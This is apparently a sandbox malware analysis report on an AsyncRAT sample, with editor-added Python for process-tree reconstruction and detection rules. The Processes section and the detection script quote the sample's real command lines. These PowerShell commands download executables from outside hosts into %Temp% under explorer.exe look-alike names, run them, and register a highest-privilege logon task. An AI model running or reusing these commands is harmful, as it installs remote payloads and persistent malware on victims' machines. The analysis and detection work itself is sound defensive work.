Malware Analysis Report

2025-01-02 12:13

Sample ID 240418-bgdrqafh31
Target 16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe
SHA256 16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54
Tags
rat default asyncrat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54

Threat Level: Known bad

The file 16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe was found to be: Known bad.

Malicious Activity Summary

rat default asyncrat

AsyncRat

Asyncrat family

Async RAT payload

Detects executables attempting to enumerate video devices using WMI

Checks computer location settings

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Enumerates physical storage devices

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Delays execution with timeout.exe

Creates scheduled task(s)

Uses Task Scheduler COM API

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-18 01:06

Signatures

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Asyncrat family

asyncrat

Detects executables attempting to enumerate video devices using WMI

Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-18 01:06

Reported

2024-04-18 01:09

Platform

win7-20240221-en

Max time kernel

151s

Max time network

160s

Command Line

"C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe"

Signatures

AsyncRat

rat asyncrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Detects executables attempting to enumerate video devices using WMI

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2296 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\System32\cmd.exe
PID 2296 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\System32\cmd.exe
PID 2296 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\System32\cmd.exe
PID 2924 wrote to memory of 3032 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2924 wrote to memory of 3032 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2924 wrote to memory of 3032 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2296 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\System32\cmd.exe
PID 2296 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\System32\cmd.exe
PID 2296 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\System32\cmd.exe
PID 2296 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\system32\cmd.exe
PID 2296 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\system32\cmd.exe
PID 2296 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\system32\cmd.exe
PID 2808 wrote to memory of 2516 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2808 wrote to memory of 2516 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2808 wrote to memory of 2516 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2520 wrote to memory of 2452 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2520 wrote to memory of 2452 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2520 wrote to memory of 2452 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2924 wrote to memory of 2904 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2924 wrote to memory of 2904 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2924 wrote to memory of 2904 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2808 wrote to memory of 852 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\system.exe
PID 2808 wrote to memory of 852 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\system.exe
PID 2808 wrote to memory of 852 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\system.exe
PID 852 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Roaming\system.exe C:\Windows\System32\cmd.exe
PID 852 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Roaming\system.exe C:\Windows\System32\cmd.exe
PID 852 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Roaming\system.exe C:\Windows\System32\cmd.exe
PID 1116 wrote to memory of 2600 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1116 wrote to memory of 2600 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1116 wrote to memory of 2600 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2924 wrote to memory of 2024 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2924 wrote to memory of 2024 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2924 wrote to memory of 2024 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1116 wrote to memory of 788 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1116 wrote to memory of 788 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1116 wrote to memory of 788 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2924 wrote to memory of 1676 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2924 wrote to memory of 1676 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2924 wrote to memory of 1676 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1116 wrote to memory of 3028 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1116 wrote to memory of 3028 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1116 wrote to memory of 3028 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1116 wrote to memory of 2092 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1116 wrote to memory of 2092 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1116 wrote to memory of 2092 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
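The table above has one row per WriteProcessMemory call, which is why every parent/child pair appears three times on this Win7 run (and twice on the Win10 run further down): a parent writes into a child it is creating during CreateProcess, so these rows describe the process tree rather than injection into an unrelated process. Every writer listed here is the parent of its target, as the Processes list confirms. The following Python script is an added example by the editor, not sandbox output: it parses rows copied from this table (embedded as constructed input, repeats included), collapses the repeats, and prints the tree, which makes it easy to see that the dropped system.exe (PID 852) re-runs the same cmd.exe > powershell.exe download chain as the original sample (PID 2296).

```python
"""Rebuild the process tree from the 'Suspicious use of WriteProcessMemory' rows.
Added example by the editor, not sandbox output. SAMPLE_ROWS is copied from the
behavioral1 table above (repeats kept on purpose); parsing and rendering are the
editor's own."""
import re
from collections import defaultdict
from typing import Dict, List, Tuple

ROW_RE = re.compile(r"^PID (\d+) wrote to memory of (\d+) N/A (\S+) (\S+)$")

# Constructed input: rows copied from the table above; the first pair is repeated
# three times exactly as the report shows it.
SAMPLE_ROWS = r"""
PID 2296 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\System32\cmd.exe
PID 2296 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\System32\cmd.exe
PID 2296 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\System32\cmd.exe
PID 2924 wrote to memory of 3032 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2296 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\System32\cmd.exe
PID 2296 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\system32\cmd.exe
PID 2808 wrote to memory of 2516 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2520 wrote to memory of 2452 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2924 wrote to memory of 2904 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2808 wrote to memory of 852 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\system.exe
PID 852 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Roaming\system.exe C:\Windows\System32\cmd.exe
PID 1116 wrote to memory of 2600 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2924 wrote to memory of 2024 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1116 wrote to memory of 788 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2924 wrote to memory of 1676 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1116 wrote to memory of 3028 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1116 wrote to memory of 2092 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"""

Edge = Tuple[int, int, str, str]  # (parent pid, child pid, parent image, child image)


def parse_rows(text: str) -> List[Edge]:
    """One edge per distinct (parent, child) pair, in first-seen order. The sandbox
    logs every WriteProcessMemory call and a parent writes into a child it is
    creating more than once, so identical rows are collapsed."""
    seen, edges = set(), []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            edge = (int(m.group(1)), int(m.group(2)), m.group(3), m.group(4))
            if edge not in seen:
                seen.add(edge)
                edges.append(edge)
    return edges


def build_tree(edges: List[Edge]):
    """Return (children by pid, image path by pid, root pids)."""
    children: Dict[int, List[int]] = defaultdict(list)
    image: Dict[int, str] = {}
    for ppid, pid, pimg, cimg in edges:
        children[ppid].append(pid)
        image.setdefault(ppid, pimg)
        image[pid] = cimg
    as_child = {pid for kids in children.values() for pid in kids}
    roots = [p for p in children if p not in as_child]
    return children, image, roots


def depth(children: Dict[int, List[int]], pid: int) -> int:
    """Length of the longest descent chain starting at pid (pid itself counts as 1)."""
    return 1 + max((depth(children, k) for k in children.get(pid, [])), default=0)


def render(children, image, roots) -> str:
    """Indented tree using only the image file name."""
    out: List[str] = []

    def walk(pid: int, level: int) -> None:
        name = image[pid].rsplit("\\", 1)[-1]
        out.append("  " * level + f"{pid} {name}")
        for kid in children.get(pid, []):
            walk(kid, level + 1)

    for root in roots:
        walk(root, 0)
    return "\n".join(out)


if __name__ == "__main__":
    c, i, r = build_tree(parse_rows(SAMPLE_ROWS))
    print(render(c, i, r))
```

The deepest chain is five processes long (sample > cmd.exe > system.exe > cmd.exe > powershell.exe), i.e. the persisted copy repeats the whole first stage. Real injection would show up here as a writer that is not the parent of its target, which no row in this report does.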

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe

"C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"' & exit

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp90EA.tmp.bat""

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"'

C:\Windows\system32\timeout.exe

timeout 3

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')

C:\Users\Admin\AppData\Roaming\system.exe

"C:\Users\Admin\AppData\Roaming\system.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'
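The Processes list above is the entire first stage: the sample spawns cmd.exe, which has PowerShell fetch two payloads from xcu.exgaming.click and xcu5.exgaming.click into %Temp% as ExpIorer.exe (uppercase I in place of the l) and ExplIorer.exe (an extra uppercase I), both meant to pass for explorer.exe in a process list; it registers a logon task named "system" at the highest run level pointing at %AppData%\Roaming\system.exe, which per the Files section below has the same SHA256 as the submitted sample and is therefore a self-copy; and it runs a temporary .bat that sleeps with timeout 3 before launching that copy. Note that the Network table below records only DNS lookups for the two exgaming.click hosts, no TCP connection to them, and no ExpIorer.exe or ExplIorer.exe appears in Files, so this report does not show the second-stage downloads completing. The following Python script is an added example by the editor, not sandbox output and not AsyncRAT code: it runs four detection rules over command lines copied from this list (embedded as constructed input) and flags each link of the chain. The list of imitated binary names and the one-edit tolerance for look-alike file names are the editor's assumptions.

```python
"""Detection rules for the download/persistence chain in this report's Processes list.
Added example by the editor: not sandbox output and not AsyncRAT code. The command
lines are copied from the behavioral1 Processes section; the rules, the list of
imitated binary names and the one-edit tolerance are the editor's own assumptions."""
import re
from collections import Counter
from dataclasses import dataclass
from typing import List, Optional

# Constructed input: command lines copied from the Processes section above.
SAMPLE_CMDLINES = [
    r'''"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit''',
    r'''powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')''',
    r"""schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"'""",
    r'''timeout 3''',
    r'''powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')''',
    r'''"C:\Users\Admin\AppData\Roaming\system.exe"''',
]

# Glyphs commonly swapped into a file name so it reads like a system binary.
CONFUSABLES = str.maketrans({"I": "l", "1": "l", "|": "l", "0": "o"})
# Names worth imitating (editor's assumption; extend for your environment).
IMITATED = ("explorer.exe", "svchost.exe", "lsass.exe", "csrss.exe", "winlogon.exe")

DOWNLOAD_RE = re.compile(r"DownloadFile\(\s*'([^']+)'\s*,\s*'([^']+)'\s*\)", re.I)
QUOTED_EXE_RE = re.compile(r"""['"]([^'"]+\.exe)['"]""", re.I)
TASK_TARGET_RE = re.compile(r"""/tr\s+['"]*([^'"]+)""", re.I)
TIMEOUT_RE = re.compile(r"^\s*timeout(?:\.exe)?\s+(?:/t\s+)?(\d+)", re.I)


@dataclass(frozen=True)
class Finding:
    rule: str
    evidence: str


def _lev(a: str, b: str) -> int:
    """Levenshtein distance (single-row dynamic programming)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def homoglyph_of(filename: str) -> Optional[str]:
    """Name of the system binary `filename` imitates, or None for the genuine name
    or for anything not within one edit once confusable glyphs are normalised."""
    if filename.lower() in IMITATED:
        return None
    norm = filename.translate(CONFUSABLES).lower()
    return next((legit for legit in IMITATED if _lev(norm, legit) <= 1), None)


def _user_writable(path: str) -> bool:
    low = path.lower()
    return any(t in low for t in ("%temp%", "%appdata%", "%localappdata%")) or (
        "\\users\\" in low and "\\appdata\\" in low)


def analyze(cmdlines: List[str]) -> List[Finding]:
    found: List[Finding] = []
    for line in cmdlines:
        # 1. WebClient.DownloadFile writing into a user-writable temp location.
        for url, dst in DOWNLOAD_RE.findall(line):
            if _user_writable(dst):
                found.append(Finding("download_to_temp", f"{url} -> {dst}"))
        # 2. Quoted .exe names that imitate a system binary (one finding per name per line).
        for name in sorted({re.split(r"[\\/]+", p)[-1] for p in QUOTED_EXE_RE.findall(line)}):
            legit = homoglyph_of(name)
            if legit:
                found.append(Finding("homoglyph_filename", f"{name} imitates {legit}"))
        # 3. Logon-triggered task at highest run level whose target lives in the user profile.
        if all(re.search(p, line, re.I) for p in (r"schtasks\s+/create", r"/sc\s+onlogon", r"/rl\s+highest")):
            m = TASK_TARGET_RE.search(line)
            if m and _user_writable(m.group(1)):
                found.append(Finding("logon_task_highest", m.group(1)))
        # 4. timeout.exe used as a sleep before the next stage.
        m = TIMEOUT_RE.match(line)
        if m:
            found.append(Finding("timeout_delay", f"{m.group(1)}s"))
    return found


def count_by_rule(findings: List[Finding]) -> dict:
    return dict(Counter(f.rule for f in findings))


if __name__ == "__main__":
    for f in analyze(SAMPLE_CMDLINES):
        print(f"{f.rule:20} {f.evidence}")
```

Against the six command lines above the script reports four downloads into %Temp%, four look-alike file names (the two ExpIorer/ExplIorer variants, each seen in a cmd.exe wrapper and again in the PowerShell child), one highest-run-level logon task pointing into the profile, and one timeout delay; the genuine system.exe and cmd.exe names are not flagged. The homoglyph rule is deliberately loose (one edit after glyph normalisation), so expect it to flag names like explorer2.exe as well and treat it as a triage hint rather than a verdict.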

Network

Country Destination Domain Proto
US 8.8.8.8:53 xcu.exgaming.click udp
US 8.8.8.8:53 xcu5.exgaming.click udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.3.235:443 pastebin.com tcp

Files

memory/2296-0-0x0000000000010000-0x0000000000028000-memory.dmp

memory/2296-1-0x000007FEF50B0000-0x000007FEF5A9C000-memory.dmp

memory/2296-3-0x000000001AE50000-0x000000001AED0000-memory.dmp

memory/3032-8-0x000000001B180000-0x000000001B462000-memory.dmp

memory/3032-10-0x0000000001E30000-0x0000000001E38000-memory.dmp

memory/3032-9-0x000007FEED5A0000-0x000007FEEDF3D000-memory.dmp

memory/3032-11-0x00000000025C0000-0x0000000002640000-memory.dmp

memory/3032-12-0x000007FEED5A0000-0x000007FEEDF3D000-memory.dmp

memory/3032-13-0x00000000025C0000-0x0000000002640000-memory.dmp

memory/3032-14-0x00000000025C0000-0x0000000002640000-memory.dmp

memory/3032-15-0x00000000025C0000-0x0000000002640000-memory.dmp

